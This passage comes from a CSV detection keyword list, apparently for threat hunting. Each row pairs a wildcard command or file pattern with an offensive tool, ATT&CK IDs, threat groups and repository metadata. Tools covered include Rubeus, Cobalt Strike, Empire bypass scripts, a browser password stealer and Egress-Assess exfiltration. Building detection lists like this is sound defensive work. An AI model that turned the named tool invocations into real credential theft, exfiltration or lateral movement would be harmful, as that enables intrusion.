tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* cccam-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* certipy-ad*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* changepw * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"* charlotte.dll *","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"* CharSubroutine-Macro.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"* -CheckShareAccess -Verbose*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"* --check-tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -ChildPath *fodhelper.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ChildPath *sdclt.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* chimera.py *","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"* chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* chimera_automation *.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"* chrome logindata *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"* chrome masterkey *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"* chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"* cics-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* cics-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* cics-user-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* cics-user-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* CIMplant.exe*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* citrix-brute-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* citrix-enum-apps.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* citrix-enum-apps-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* citrix-enum-servers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* citrix-enum-servers-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* clamav-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -client ftp -ip * -Username * -Password * -Datatype ssn -Size * -Verbose*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* -client http -ip * -Datatype cc -Size * -Port * -Loop * -Fast -Verbose*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* -client icmp -ip * -Datatype ssn -Report -Verbose*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* -client smb -ip * -Datatype *c:\*.* -Verbose*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* -Client SMTPOutlook -IP * -NoPing -DataType *ssn*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* client.py -s http*:5000 --cert /*.pem*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"* clock-skew.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Clone_Token /Process:* /Command:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"* cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"* cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"* cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* coap-resources.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -cobalt *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"* cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"* coerce * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* coerce -u * -p * --listener-ip*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* CoffeeExecuteFunction*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"* --coin *--nicehash *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"* collect activedirectory --*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"* --collectallproperties*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --CollectionMethod All *ldap*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --CollectionMethod All *--ZipFileName *.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* -CollectionMethod All*loggedon*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"* -CollectionMethod LoggedOn -Verbose*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"* -CollectionMethod stealth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - 